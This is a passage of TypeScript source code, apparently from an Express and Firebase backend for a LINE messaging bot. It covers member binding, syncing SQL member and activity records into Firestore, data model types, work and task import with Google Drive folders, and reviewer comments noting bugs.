                // await groupOrganizationService.getGroupByParentId(result.id).then(groupSnapshot => {
                //     if (groupSnapshot.empty) {
                //         groupOrganizationService.updateGroup(groupInfo)
                //     }
                // })
                return receiverService.getReceiverByParentId(result.id).then(orgSnapshot => {
                    if (orgSnapshot.empty) {
                        receiverService.setReceiver(companyInfo).catch(err => {
                            console.log(err)
                            return Promise.resolve("ok")
                        })
                    }
                    // Welcome message pushed to the freshly bound platform id.
                    let lineMsg = {
                        type: "text",
                        text: `感謝${result.name} ,加入《${applicationName}》。請點選主選單,開始體驗智能世代下的通訊協作。`
                    }
                    pushMessage(platformId, lineMsg)
                    return memberService.setMember(result).then(async () => {
                        let firebaseToken = await generateFirebaseToken(platformId).catch(error => {
                            console.log("generateFirebaseToken error:", error)
                        })
                        console.log("----------", firebaseToken)
                        return firebaseToken
                    }).catch(err => {
                        console.log(err)
                        return Promise.resolve("ok")
                    })
                })
            })
        });
    }).catch(error => {
        console.log(error)
        return Promise.reject(error)
    })
}
/**
 * Appends a Line group ({ groupId, name }) to the lineGroup list of the member
 * bound to `lineId`. Resolves on success (also when the member is unknown);
 * rejects with a user-facing message when groupName/groupId are missing.
 * Fixes: removed the `new Promise(async ...)` anti-pattern (rejections inside
 * the executor could be lost) and ~35 lines of dead commented-out code.
 * `applicationName` is kept for interface compatibility although unused.
 */
const groupBinding = async (lineId: string, data: any, applicationName: string) => {
    const groupName = data.groupName
    const groupId = data.groupId
    if (!groupName || !groupId) {
        return Promise.reject("請輸入帳號密碼")
    }
    const memberSnapshot = await memberService.getMemberByAnyId(lineId)
    if (memberSnapshot.empty) {
        console.log("====Member不存在====")
        return
    }
    let member = memberSnapshot.docs[0].data() as Member
    // Start from the existing list when present, then append the new group.
    let newGroups: Member["lineGroup"] = []
    if (member.hasOwnProperty("lineGroup")) {
        newGroups = member.lineGroup
    }
    newGroups.push({ groupId: groupId, name: groupName })
    member = {
        ...member,
        lineGroup: newGroups
    }
    await memberService.setMember(member)
}
/**
 * Bootstraps an account: creates the Firebase user (failure only logged) and
 * runs the login/registration flow keyed by mobile phone.
 * Fix: removed the `new Promise(async ...)` wrapper and the unused
 * `newUid`/`firebaseDesktop` locals; errors from login() now reject directly.
 */
const initialization = async (accInfo: any) => {
    await createFirebaseAccount(accInfo.email, accInfo.mobile, accInfo.name).catch(error => {
        // Account may already exist; registration below still proceeds.
        console.log("DesktopFirebaseToken error:", error)
    })
    await login("", { mobilePhone: accInfo.mobile }, config.appName)
}
/**
 * Pushes a Line buttons-template card for a product document.
 * With a fileId: one URI action opening the PDF viewer; without: a postback
 * action reporting the missing file. Returns "OK" synchronously (the push is
 * fire-and-forget). Fix: removed dead commented-out template variants.
 */
const productInfo = (lineId: string, data: any) => {
    let productName = data.productName
    let fileId = data.fileId
    let type = data.type
    let url = `${config.uriName}#/pdf/${lineId}/`
    let lineMsgArray = []
    let lineMsg = {
        type: "template",
        altText: `${productName}_${type}`,
        template: {
            type: "buttons",
            text: `${productName}`,
            actions: []
        }
    }
    if (fileId == undefined || fileId.length == 0) {
        // No stored file: postback so the bot can report the missing document.
        lineMsg.template.actions.push({
            "type": "postback",
            "label": type,
            "data": `action=fileNotFound&fileName=${productName}${type}`
        })
    } else {
        lineMsg.template.actions.push(
            {
                "type": "uri",
                "label": `${type}`,
                "uri": url + fileId
            }
        )
    }
    lineMsgArray.push(lineMsg)
    pushMessage(lineId, lineMsgArray)
    return "OK"
}
// Pushes a Line buttons-template message linking to the PDF viewer for a
// drive folder: button label is the file name, template body shows its path.
// Returns "OK" synchronously; the push itself is fire-and-forget.
const fileVersion = (lineId: string, data: any) => {
    const { folderId, name, path } = data
    console.log("folderId", folderId)
    console.log("name", name)
    console.log("path", path)
    const message: TemplateMessage = {
        type: "template",
        altText: `${name}`,
        template: {
            type: "buttons",
            text: `${path}`,
            actions: [
                {
                    type: "uri",
                    label: `${name}`,
                    uri: `${config.uriName}#/pdf/${lineId}/${folderId}`
                }
            ]
        }
    }
    pushMessage(lineId, message)
    return "OK"
}
// Mints a Firebase custom auth token whose uid is the platform id.
function generateFirebaseToken(userId: string) {
    let firebaseUid = userId;
    // admin.auth().dis
    return admin.auth().createCustomToken(firebaseUid);
}
// Creates a Firebase auth user for the given account.
// NOTE(review): "<PASSWORD>" is a redacted placeholder — this line will not
// compile as-is; restore the original password expression (likely `mobile`).
function createFirebaseAccount(email: string, mobile: string, name: string) {
    return admin.auth().createUser({
        email: email,
        password: <PASSWORD>,
        displayName: name
    });
}
export default router
<file_sep>/src/DBsync.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as Moment from "moment-timezone"
import * as menuService from './services/menuService'
import * as memberService from "./services/memberService"
import * as receiverService from "./services/receiverService"
import { jsonMember, Item, Member, MemberOrganization } from "./model"
const router = Router()
/**
 * POST /connectSQL — ingestion endpoint for rows synced from the SQL database.
 * Acks with 200 immediately and then processes the payload; the shape of the
 * first row decides which importer runs.
 */
router.post("/connectSQL", async (req, res) => {
    const recordsets = req.body as any[]
    console.log("----connectSQL body-------------")
    console.log(JSON.stringify(recordsets, null, 4))
    // Respond first so the SQL-side job is not blocked by Firestore writes;
    // note any import error after this point is not reported to the caller.
    res.sendStatus(200)
    if (recordsets[0].memberName) {
        // Rows carrying memberName are member/participant records.
        await importMemberRecordset(recordsets)
    } else if (recordsets[0].workName == "拜訪") {
        await importVisitActivityRecordset(recordsets)
    } else if (recordsets[0].workName == "課程") {
        await importCourseActivityRecordset(recordsets)
    }
})
/**
 * Converts SQL course rows into activity Items (period/address/location in
 * `data`, sorted by start date) and hands them to importCourseActivity.
 * @param recordsets raw rows from the course query
 */
const importCourseActivityRecordset = async (recordsets) => {
    let activity: Item
    let activityUploads: Item[] = []
    for (const data of recordsets) {
        let start = Moment(data.startDate).format("YYYY/MM/DD")
        let end = Moment(data.endDate).format("YYYY/MM/DD")
        activity = {
            id: data.id,
            name: data.courseName.trim(),
            index: new Date(start).getTime(),
            data: {
                period: start + " - " + end,
                address: data.address.trim(),
                location: data.location.trim(),
                time: "",
            }
        }
        activityUploads.push(activity)
    }
    console.log("----------Course------------", activityUploads)
    await importCourseActivity(activityUploads)
}
/**
 * Converts SQL visit rows into activity Items. The name is composed as
 * "<city>拜訪 (start - end)"; visit-specific URLs are carried in `data`.
 * @param recordsets raw rows from the visit query
 */
const importVisitActivityRecordset = async (recordsets) => {
    let activity: Item
    let activityUploads: Item[] = []
    for (const data of recordsets) {
        let start = Moment(data.startDate).format("YYYY/MM/DD")
        let end = Moment(data.endDate).format("YYYY/MM/DD")
        activity = {
            id: data.id,
            name: data.cityName.trim() + "拜訪 (" + start + " - " + end + ")",
            index: new Date(start).getTime(),
            data: {
                period: start + " - " + end,
                address: data.address.trim(),
                location: data.location.trim(),
                time: "",
                invitationUrl: data.invitationUrl,
                nursingUrl: data.nursingUrl,
                volunteerUrl: data.volunteerUrl
            }
        }
        activityUploads.push(activity)
    }
    console.log("-----------Visit------------", activityUploads)
    await importVisitActivity(activityUploads)
}
/**
 * Converts SQL member rows into jsonMember uploads (normalizing the Chinese
 * date "X年Y月Z日" into "X/Y/Z/"), resolves the organization root node by
 * (visitFlowName, sessionId), and imports the members under it.
 * NOTE(review): assumes the root node exists — docs[0] is accessed unguarded.
 * @param recordsets raw rows from the member query
 */
const importMemberRecordset = async (recordsets) => {
    let member: jsonMember
    let memberUploads: jsonMember[] = []
    for (const data of recordsets) {
        console.log("-------SQLDB member result---------\n", data)
        let date = data.meetingDate.replace("年", "/").replace("月", "/").replace("日", "/")
        member = {
            memberId: data.memberId,
            organizationId: data.participantId,
            personalId: "",
            name: data.memberName,
            title: "",
            division: data.division,
            department: data.department,
            mobilePhone: data.mobilePhone,
            email: data.email,
            lineId: data.lineId,
            wechatId: data.wechatId,
            meetingDate: date,
            meetingTime: data.meetingTime ? data.meetingTime : "",
            meetingLocation: data.meetingLocation,
            preEventMeeting: data.preEventMeeting,
            unitIndex: 0,
            referrer: ""
        }
        memberUploads.push(member)
    }
    const nodeSnapshot = await receiverService.getReceiverByNameAndParentId(recordsets[0].visitFlowName.trim(), recordsets[0].sessionId)
    console.log("-------組織根節點ID---------\n", nodeSnapshot.docs[0].data().id)
    await importMember(memberUploads, nodeSnapshot.docs[0].data().id)
}
/**
 * Syncs course sessions: upserts each activity into the "before" and "during"
 * course menus, then ensures each has 課前/課中 member-organization root nodes
 * (reusing existing nodes when present).
 * @param activityUploads course Items produced by importCourseActivityRecordset
 */
const importCourseActivity = async (activityUploads: Item[]) => {
    for (const activityUpload of activityUploads) {
        if (activityUpload.name != "") {
            // Candidate root nodes; replaced by stored ones if they already exist.
            let memberReceiverBefore: MemberOrganization = {
                id: uuidv4(),
                name: "課前",
                type: "department",
                index: new Date().getTime(),
                childrenId: [],
                parentId: activityUpload.id
            }
            let memberReceiverAfter: MemberOrganization = {
                id: uuidv4(),
                name: "課中",
                type: "department",
                index: new Date().getTime(),
                childrenId: [],
                parentId: activityUpload.id
            }
            await menuService.setBeforeCourseActivity(activityUpload)
            console.log("====課前梯次建立 / 更新成功====")
            memberReceiverBefore.parentId = activityUpload.id
            await menuService.setAfterCourseActivity(activityUpload)
            console.log("====課中梯次建立 / 更新成功====")
            memberReceiverAfter.parentId = activityUpload.id
            // Prefer existing root nodes over the freshly built candidates.
            const snapshotBefore = await receiverService.getReceiverByNameAndParentId("課前", memberReceiverBefore.parentId)
            if (!snapshotBefore.empty)
                memberReceiverBefore = snapshotBefore.docs[0].data() as MemberOrganization
            const snapshotAfter = await receiverService.getReceiverByNameAndParentId("課中", memberReceiverAfter.parentId)
            if (!snapshotAfter.empty)
                memberReceiverAfter = snapshotAfter.docs[0].data() as MemberOrganization
            // Create / refresh the member-organization root nodes.
            await receiverService.setReceiver(memberReceiverBefore)
            await receiverService.setReceiver(memberReceiverAfter)
            console.log("====課前 / 中成員組織根節點建立成功====")
        }
    }
}
/**
 * Syncs visit sessions: same pattern as importCourseActivity but for the
 * visit menus, with 拜訪前/拜訪後 root nodes.
 * @param activityUploads visit Items produced by importVisitActivityRecordset
 */
const importVisitActivity = async (activityUploads: Item[]) => {
    for (const activityUpload of activityUploads) {
        if (activityUpload.name != "") {
            // const beforeActivities = await menuService.getBeforeActivityByNmae(activityUpload.name)
            // const afterActivities = await menuService.getAfterActivityByNmae(activityUpload.name)
            let memberReceiverBefore: MemberOrganization = {
                id: uuidv4(),
                name: "拜訪前",
                type: "department",
                parentId: activityUpload.id,
                index: new Date().getTime(),
                childrenId: []
            }
            let memberReceiverAfter: MemberOrganization = {
                id: uuidv4(),
                name: "拜訪後",
                type: "department",
                parentId: activityUpload.id,
                index: new Date().getTime(),
                childrenId: []
            }
            await menuService.setBeforeActivity(activityUpload)
            console.log("====拜訪前梯次建立 / 更新成功====")
            memberReceiverBefore.parentId = activityUpload.id
            await menuService.setAfterActivity(activityUpload)
            console.log("====拜訪後梯次建立 / 更新成功====")
            memberReceiverAfter.parentId = activityUpload.id
            // Prefer existing root nodes over the freshly built candidates.
            const snapshotBefore = await receiverService.getReceiverByNameAndParentId("拜訪前", memberReceiverBefore.parentId)
            if (!snapshotBefore.empty)
                memberReceiverBefore = snapshotBefore.docs[0].data() as MemberOrganization
            const snapshotAfter = await receiverService.getReceiverByNameAndParentId("拜訪後", memberReceiverAfter.parentId)
            if (!snapshotAfter.empty)
                memberReceiverAfter = snapshotAfter.docs[0].data() as MemberOrganization
            // Create / refresh the member-organization root nodes.
            await receiverService.setReceiver(memberReceiverBefore)
            await receiverService.setReceiver(memberReceiverAfter)
            console.log("====拜訪前 / 後成員組織根節點建立成功====")
        }
    }
}
/**
 * Imports/updates a batch of members under the organization tree rooted at
 * `nodeId`: upserts the Member document, then ensures the division node,
 * department node, and finally the member leaf node exist along the path
 * root → division → department → member, adding the member's id to each
 * department-level `childrenId` list along the way.
 * @param memberUploads normalized member rows
 * @param nodeId id of the existing organization root node
 */
const importMember = async (memberUploads: jsonMember[], nodeId: string) => {
    const rootSnapshot = await receiverService.getReceiverById(nodeId)
    if (!rootSnapshot.empty) {
        console.log("====組織根節點存在====")
        const rootOrg = rootSnapshot.docs[0].data() as MemberOrganization
        for (const memberUpload of memberUploads) {
            /**
             * Does the Member master record exist? (looked up by memberId)
             */
            // const memberSnapshot = await memberService.getMembersByMobilePhoneAndName(memberUpload.mobilePhone.trim(), memberUpload.name.trim())
            const memberSnapshot = await memberService.getMemberByAnyId(memberUpload.memberId)
            let member: Member
            if (memberSnapshot.empty) {
                console.log("====Member不存在====")
                // Not found: create the Member from the upload.
                member = {
                    id: memberUpload.memberId,
                    name: memberUpload.name.trim(),
                    title: memberUpload.title.trim(),
                    division: memberUpload.division.trim(),
                    department: memberUpload.department.trim(),
                    email: memberUpload.email.trim(),
                    mobilePhone: memberUpload.mobilePhone.trim(),
                    lineId: memberUpload.lineId ? memberUpload.lineId.trim() : "",
                    wechatId: memberUpload.wechatId ? memberUpload.wechatId.trim() : "",
                    data: {
                        meetingDate: memberUpload.meetingDate ? memberUpload.meetingDate.trim() : "",
                        meetingTime: memberUpload.meetingTime ? memberUpload.meetingTime.trim() : "",
                        meetingLocation: memberUpload.meetingLocation ? memberUpload.meetingLocation.trim() : "",
                        preEventMeeting: memberUpload.preEventMeeting ? memberUpload.preEventMeeting.trim() : "",
                    },
                    role: "customer",
                    index: new Date().getTime(),
                    unReadMessages: 0
                }
            } else {
                console.log("====Member已存在====")
                // Found: refresh title/department/contact/meeting fields, but
                // only with non-empty upload values (empty values never clobber).
                member = memberSnapshot.docs[0].data() as Member
                if (memberUpload.name && memberUpload.name !== "")
                    member.name = memberUpload.name.trim()
                if (memberUpload.email && memberUpload.email !== "")
                    member.email = memberUpload.email.trim()
                if (memberUpload.mobilePhone && memberUpload.mobilePhone !== "")
                    member.mobilePhone = memberUpload.mobilePhone.trim()
                if (memberUpload.title && memberUpload.title !== "")
                    member.title = memberUpload.title.trim()
                if (memberUpload.division && memberUpload.division !== "")
                    member.division = memberUpload.division.trim()
                if (memberUpload.department && memberUpload.department !== "")
                    member.department = memberUpload.department.trim()
                if (memberUpload.meetingDate && memberUpload.meetingDate !== "")
                    member.data.meetingDate = memberUpload.meetingDate.trim()
                if (memberUpload.meetingTime && memberUpload.meetingTime !== "")
                    member.data.meetingTime = memberUpload.meetingTime.trim()
                if (memberUpload.meetingLocation && memberUpload.meetingLocation !== "")
                    member.data.meetingLocation = memberUpload.meetingLocation.trim()
                if (memberUpload.preEventMeeting && memberUpload.preEventMeeting !== "")
                    member.data.preEventMeeting = memberUpload.preEventMeeting.trim()
                // Also refresh LineId / WeChatId when supplied.
                if (memberUpload.lineId && memberUpload.lineId !== "")
                    member.lineId = memberUpload.lineId.trim()
                if (memberUpload.wechatId && memberUpload.wechatId !== "")
                    member.wechatId = memberUpload.wechatId.trim()
            }
            await memberService.setMember(member)
            console.log("====member建立 / 更新成功====")
            // Track the member on the root node as well.
            if (rootOrg.type == "department") {
                if (rootOrg.childrenId.indexOf(member.id) < 0)
                    rootOrg.childrenId.push(member.id)
            }
            let parentId = nodeId
            if (memberUpload.division && memberUpload.division !== "") {
                /**
                 * Does the division node exist under the root?
                 */
                const divsionSnapshot = await receiverService.getReceiverByNameAndParentId(memberUpload.division.trim(), nodeId)
                let divsionReceiver: MemberOrganization
                if (divsionSnapshot.empty) {
                    console.log("====Divsion不存在====")
                    // Not found: create the division node with this member in it.
                    divsionReceiver = {
                        id: uuidv4(),
                        name: memberUpload.division.trim(),
                        type: "department",
                        parentId: nodeId,
                        index: memberUpload.unitIndex,
                        childrenId: [member.id]
                    }
                } else {
                    console.log("====Divsion存在====")
                    divsionReceiver = divsionSnapshot.docs[0].data() as MemberOrganization
                    if (divsionReceiver.type == "department") {
                        if (divsionReceiver.childrenId.indexOf(member.id) < 0) {
                            console.log("====將member存進Divsion====")
                            divsionReceiver.childrenId.push(member.id)
                        }
                    }
                }
                await receiverService.setReceiver(divsionReceiver)
                parentId = divsionReceiver.id
            }
            if (memberUpload.department && memberUpload.department !== "") {
                /**
                 * Does the department node exist under the division (or root)?
                 */
                const departmentSnapshot = await receiverService.getReceiverByNameAndParentId(memberUpload.department.trim(), parentId)
                let departmentReceiver: MemberOrganization
                if (departmentSnapshot.empty) {
                    console.log("====Department不存在====")
                    // Not found: create the department node with this member in it.
                    departmentReceiver = {
                        id: uuidv4(),
                        name: memberUpload.department.trim(),
                        type: "department",
                        parentId: parentId,
                        index: new Date().getTime(),
                        childrenId: [member.id]
                    }
                } else {
                    console.log("====Department存在====")
                    departmentReceiver = departmentSnapshot.docs[0].data() as MemberOrganization
                    if (departmentReceiver.type == "department") {
                        if (departmentReceiver.childrenId.indexOf(member.id) < 0) {
                            console.log("====將member存進Department====")
                            departmentReceiver.childrenId.push(member.id)
                        }
                    }
                }
                await receiverService.setReceiver(departmentReceiver)
                parentId = departmentReceiver.id
            }
            /**
             * Does this department/division already contain the member leaf node?
             */
            const memberOrgSnapshot = await receiverService.getReceiverByNameAndParentId(memberUpload.name.trim(), parentId)
            if (memberOrgSnapshot.empty) {
                console.log("====MemberReceiver不存在====")
                // Not found: create the member leaf node.
                const memberReceiver: MemberOrganization = {
                    id: memberUpload.organizationId,
                    name: memberUpload.name.trim(),
                    type: "member",
                    memberId: member.id,
                    parentId: parentId,
                    index: new Date().getTime()
                }
                await receiverService.setReceiver(memberReceiver)
            } else {
                console.log("====MemberReceiver存在====")
            }
            console.log("--------------------------------------------------")
        }
        // Persist the root's accumulated childrenId changes once at the end.
        await receiverService.setReceiver(rootOrg)
    } else {
        console.log("====組織根節點不存在====")
    }
}
export default router<file_sep>/src/model.ts
import * as Line from '@line/bot-sdk';
import { Channel } from '@google-cloud/storage';
// A contact / end-user record stored in the Member collection.
export type Member = {
    id: string
    name: string
    title?: string
    division?: string
    department?: string
    email: string
    mobilePhone: string
    businessPhone?: string
    lineId: string
    wechatId: string
    role?: "manager" | "staff" | "student" | "customer"
    sid?: string // student number / employee number
    path?: string
    index?: number
    student?: string
    data?: any,
    // NOTE(review): the literal types "" here almost certainly meant `string` —
    // as written only empty strings are assignable; confirm and fix.
    lineGroup?: { groupId: "", name: "" }[]
    unReadMessages: number // only present when type == Member || type == Line || type == WeChat
    session?: string
    groupId?: string
}
// An operator of the system (sender of events/messages).
export type User = {
    id: string
    name: string
    email: string
    role: "admin" | "manager" | "staff"
}
// A node of the member-organization tree: either a container ("department",
// channel, etc., with childrenId) or a "member" leaf pointing at a Member doc.
export type MemberOrganization = ({
    type: "department" | "Work" | "Task" | "Item" | "Flow" | "Line" | "WeChat" | "Email" | "SMS"
    childrenId?: any[] // everyone under this organization node
} | {
    type: "member"
    memberId?: string // id in the Member collection
    channelId?: string // only present when type == Line || type == WeChat
}) & {
    id: string
    index?: number // sort order
    parentId: string
    name: string
    member?: Member
}
// A menu-tree node (parentId forms the hierarchy, index the ordering).
export type Menu = {
    id: string
    parentId: string
    name: string
    index: number
    role?: "manager" | "staff" | "student" | "customer"
    ownerId?: string
}
// Flat CSV row shape used when importing menus.
export type MenuCsv = {
    id: string
    business: string
    event: string
    work: string
    index: number
    role?: string
    ownerId?: string
}
// A friend/follower reference (id only).
export type Friend = {
    id: string
}
/**
* 2018/10/14
*/
export type Work = {
id: string
name: string
index: number
tasks?: Task[]
}
export type Task = {
id: string
name: string
index: number
items?: Item[]
}
export type Item = {
id: string
name: string
index: number
flows?: Flow[]
data?: ItemData
}
export type ItemData = {
period: string,
location: string,
address: string,
time?: string,
invitationUrl?: string,
nursingUrl?: string,
volunteerUrl?: string
}
export type MemberData = {
memberName?: string,
invitationUrl?: string,
meetingDate?: string,
meetingTime?: string,
meetingLocation?: string,
preEventMeeting?: string
}
export type Flow = {
id: string
name: string
index: number
messageId: string
}
export type WorkUpload = {
index: number
role?: string
work: string
task?: string
activity?: string
date?: string
time?: string
address?: string
location?: string
invitationUrl?: string
nursingUrl?: string
volunteerUrl?: string
}
//////////////////////////////
export type Channel = {
line: boolean
wechat: boolean
sms: boolean
email: boolean
}
export type Catalog = {
id: string
name: string
index: number
messageId: string[]
type: "dynamic" | "static"
userId: string
}
export type MessageTemplate = {
id: string
title: string
content: string
urls?: { name: string, url: string }[]
thumb: string
type: string
channel?: "Line" | "WeChat" | "SMS" | "Email"
}
export type MessageRecord = {
id: string
workId: string
taskId: string
itemId: string
flowId: string
sender: Member
timeStamp: number
sendCount: number
successCount: number
readCount: number
title: string
type: MessageTemplate["type"],
channel: string
}
export type RecordDetail = {
id: string
receiver: Member
channel: MessageTemplate['channel']
message: string
urls?: MessageTemplate["urls"]
thumb?: string
isSucceed: boolean
receiveTime: number
read: boolean
}
export type ChatMessage = {
id: string
}
export type GARecord = {
action: string
label: {
filename: string
trackId: string
}
count: number
duration: number
}
export type File = {
id: string
mimeType: string
name: string
sid: number
fullName: string
parents: string
parentsName: Parents[]
docId: string
modifiedDate: number
createdTime: number
modifiedTime: number
}
export type Parents = {
id?: string
name?: string
fullName?: string
}
export type Message = {
type: string
textMessage?: Line.TextMessage
imageMapMessage?: Line.ImageMapMessage
buttonsMessage?: Line.TemplateButtons
confirmMessage?: Line.TemplateConfirm
carouselMessage?: Line.TemplateCarousel
imageCarouselMessage?: Line.TemplateImageCarousel
imageMessage?: Line.ImageMessage
videoMessage?: Line.VideoMessage
audioMessage?: Line.AudioMessage
locationMessage?: Line.LocationMessage
stickerMessage?: Line.StickerMessage
}
/**
* DBsync
*/
export type jsonMember = {
memberId: string,
organizationId: string,
personalId: string,
name: string,
title: string,
division: string,
department: string,
mobilePhone: string,
email: string,
lineId?: string,
wechatId?: string,
meetingDate?: string,
meetingTime?: string,
meetingLocation?: string,
preEventMeeting?: string,
unitIndex?: number,
referrer?: string
}
//MQ版系統整合
export type ScheduleEvent = PubSubEvent
export type PubSubEvent = {
id: string
timeStamp: number
}
export type Event = {
id: string
// workId: string
// taskId: string
// itemId: string
// flowId: string
// messageId: string
timeStamp: number
content: string
// files: File[]
urls: MessageTemplate["urls"]
thumb: string
type?: MessageTemplate["type"]
receivers: Member[]
sender: User
channel: string
}
export type EventResult = {
id: string
messageId: string | string[]
content: string
urls?: MessageTemplate["urls"]
thumb?: string
files?: File[]
channel: string
sender: User
// receivers: {
// id: string
// data: any[]
// }[]
// receivers: Member[]
timeStamp: number
type?: MessageTemplate["type"]
}
export type ReviewMessage = {
id: string
/**
* 0: 未處理
* 1: 通過 / 未發送
* 2: 通過 / 已發送
* 3: 未通過
*/
state: 0 | 1 | 2 | 3
content: string
channel: MessageTemplate['channel']
sender: User
// receivers: { id: string, data: any[] }[]
expectTime: number
urls: MessageTemplate['urls']
type: "immediate" | "delay"
auditor: User
receiverCount: number
}
export type Issue = {
id: string
name: string
ownerId: string //建立這議題的人
childrenId: [{ id: string, name: string }] //此議題所有參與者
}
export type IssueOrganization = ({
type: "structure" | "system"
} | {
type: "issue"
issueId: string //對應 Issue Collection 的id
ownerId: string //這份議題是屬於哪個人的
}) & {
id: string
parentId: string
name: string
}
export class Group {
id: string
name: string
ownerId: string
// childrenId?: [{ id: string, name: string }]
memberId: string[]
// lineId?: string
}
export class BatchGroup {
id: string
name: string
ownerId: string
members: { id: string, content: string }[]
}
export type GroupOrganization = ({
type: "structure" | "system"
} | {
type: "group"
groupId: string
ownerId: string
}) & {
id: string
parentId: string
name: string
}
export type Receiver = {
id: string
data: any[]
index: number
}<file_sep>/src/services/organizationService.ts
// import * as admin from 'firebase-admin';
// import { Receiver } from '../model';
// const organizationCollection = admin.firestore().collection("MemberOrganization");
// export const updateOrganization = function (org: Receiver) {
// return organizationCollection.doc(org.id).set(org, { merge: true })
// }
// export const getOrganizationById = function (id: string) {
// return organizationCollection.where("id", "==", id).get()
// }
// export const getOrganizationByParentIdAndActivityId = function (parentId: string, activityId: string) {
// return organizationCollection
// .where("parentId", "==", parentId)
// .where("activityId", "==", activityId).get()
// }
// export const getOrganizationByParentId = function (parentId: string) {
// return organizationCollection.where("parentId", "==", parentId).get()
// }
// export const getOrganizationByType = function (type: string) {
// return organizationCollection.where("type", "==", type).get()
// }
// export const getOrganizationByMemberId = function (memberId: string) {
// return organizationCollection.where("memberId", "==", memberId).get()
// }
// export const getOrganizationByName = function (name: string) {
// return organizationCollection.where("name", "==", name).get()
// }
// export const getOrganizationByNameAndParentId = function (name: string, parentId: string) {
// return organizationCollection.where("name", "==", name).where("parentId", "==", parentId).get()
// }
// export const getOrganizationByMemberIdAndParentId = function ( memberId: string, parentId: string) {
// return organizationCollection.where("memberId", "==", memberId).where("parentId", "==", parentId).get()
// }
// export const getOrganizations= function () {
// return organizationCollection.get()
// }<file_sep>/src/workWS.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as driveService from "./services/driveService"
import * as receiverService from "./services/receiverService"
import * as workService from "./services/workService"
import { Work, Task, Item, Flow, WorkUpload, MemberOrganization } from "./model"
import * as config from './config';
const router = Router()
// Bulk import of the Work > Task > Item hierarchy from an uploaded sheet.
// For each row it idempotently creates the missing Work/Task/Item documents,
// mirrors the Work/Task folders into Google Drive, and creates/updates a
// MemberOrganization root node for the task (or activity).
// Rows are processed strictly in order; failures in Drive calls are logged
// and swallowed so one bad row does not abort the batch.
router.post("/createWorks", async (req, res) => {
    const workUploads = req.body as WorkUpload[]
    for (const workUpload of workUploads) {
        console.log(JSON.stringify(workUpload, null, 4))
        let work: Work
        let task: Task
        if (workUpload.work != "") {
            const works = await workService.getWorkByName(workUpload.work)
            /**
             * Check whether the top-level Work already exists.
             */
            if (works.length == 0) {
                // not found: create it
                console.log("====建立Work====", workUpload.work)
                const newWork: Work = {
                    id: uuidv4(),
                    name: workUpload.work,
                    // NOTE(review): index is stored as-is here but coerced with
                    // `+` below for Task/Item — confirm the upload field type.
                    index: workUpload.index
                }
                await workService.setWork(newWork)
                work = newWork
            } else
                work = works[0]
            /**
             * Second level: Task.
             */
            if (workUpload.task != "") {
                const tasks = await workService.getTaskByName(work.id, workUpload.task)
                // Default receiver node; parentId is filled in below once the
                // Task id is known.
                let memberReceiver: MemberOrganization = {
                    id: uuidv4(),
                    name: workUpload.task,
                    type: "department",
                    index: new Date().getTime(),
                    childrenId: [],
                    parentId: ""
                }
                if (tasks.length == 0) {
                    // not found: create it
                    console.log("====建立Task====", workUpload.task)
                    const newTask: Task = {
                        id: uuidv4(),
                        name: workUpload.task,
                        index: +workUpload.index
                    }
                    await workService.setTask(work.id, newTask)
                    memberReceiver.parentId = newTask.id
                    task = newTask
                } else {
                    task = tasks[0]
                    memberReceiver.parentId = tasks[0].id
                }
                if (workUpload.activity == "") {
                    // Reuse an existing receiver node of the same name if one
                    // is already attached to this task.
                    const snapshot = await receiverService.getReceiverByNameAndParentId(workUpload.task, memberReceiver.parentId)
                    if (!snapshot.empty)
                        memberReceiver = snapshot.docs[0].data() as MemberOrganization
                    // create/update the member-organization root node
                    console.log("====建立成員組織根節點====")
                    await receiverService.setReceiver(memberReceiver)
                }
                const now = +Date.now()
                // Mirror Work/Task folders into Google Drive (best effort:
                // creation errors are logged, not rethrown).
                await driveService.authorize().then(auth => {
                    return driveService.getFileByName(workUpload.work).then(async businessFolder => {
                        let businessFolderInfo = { id: "" }
                        if (businessFolder.empty) {
                            await driveService.createFile(auth, workUpload.work, config.rootFolderId, "folder", now).then(folderId => {
                                console.log("folderId:", folderId)
                                businessFolderInfo = { id: folderId }
                            }).catch(err => {
                                console.log("error:", err.response)
                            })
                        } else {
                            businessFolderInfo = { id: businessFolder.docs[0].data().id }
                        }
                        // if (!businessFolder.empty) {
                        return driveService.getFileByName(workUpload.task).then(async folders => {
                            if (folders.empty) {
                                return driveService.createFile(auth, workUpload.task, businessFolderInfo.id, "folder", now).then(folderId => {
                                    console.log("folderId:", folderId)
                                }).catch(err => {
                                    console.log("error:", err.response)
                                })
                            }
                        })
                        // }
                    })
                })
            }
            /**
             * Third level: activity Item.
             */
            if (workUpload.activity != "") {
                // NOTE(review): `task` is undefined when workUpload.task == ""
                // — task.id below would throw; confirm uploads always include
                // a task whenever an activity is given.
                const activities = await workService.getItemByName(work.id, task.id, workUpload.activity)
                // NOTE(review): this receiver node is named after the task,
                // not the activity — confirm that is intended.
                let memberReceiver: MemberOrganization = {
                    id: uuidv4(),
                    name: workUpload.task,
                    type: "department",
                    index: new Date().getTime(),
                    childrenId: [],
                    parentId: ""
                }
                if (activities.length == 0) {
                    // not found: create it together with its event metadata
                    console.log("====建立Item====", workUpload.activity)
                    const activity: Item = {
                        id: uuidv4(),
                        name: workUpload.activity,
                        index: +workUpload.index,
                        data: {
                            period: workUpload.date,
                            time: workUpload.time,
                            address: workUpload.address,
                            location: workUpload.location,
                            invitationUrl: workUpload.invitationUrl,
                            nursingUrl: workUpload.nursingUrl,
                            volunteerUrl: workUpload.volunteerUrl
                        }
                    }
                    await workService.setItem(work.id, task.id, activity)
                    memberReceiver.parentId = activity.id
                } else
                    memberReceiver.parentId = activities[0].id
                const snapshot = await receiverService.getReceiverByNameAndParentId(workUpload.task, memberReceiver.parentId)
                if (!snapshot.empty)
                    memberReceiver = snapshot.docs[0].data() as MemberOrganization
                // create/update the member-organization root node
                console.log("====建立成員組織根節點====")
                await receiverService.setReceiver(memberReceiver)
            }
        }
    }
    res.sendStatus(200)
})
export default router<file_sep>/src/services/calculateChildren.ts
import { MemberOrganization } from "../model"
import { getReceiverById, getReceiverByParentId, setReceiver } from "./receiverService"
/**
 * Recursively collects the member ids under the organization node `parentId`,
 * writes the de-duplicated list onto that node's `childrenId` field (for
 * "department" nodes), and returns it.
 *
 * @param parentId id of the MemberOrganization node to (re)compute
 * @returns the unique member ids found in the whole subtree
 */
export const calculateChildren = async (parentId: string): Promise<string[]> => {
    const childOrgShapshot = await getReceiverByParentId(parentId)
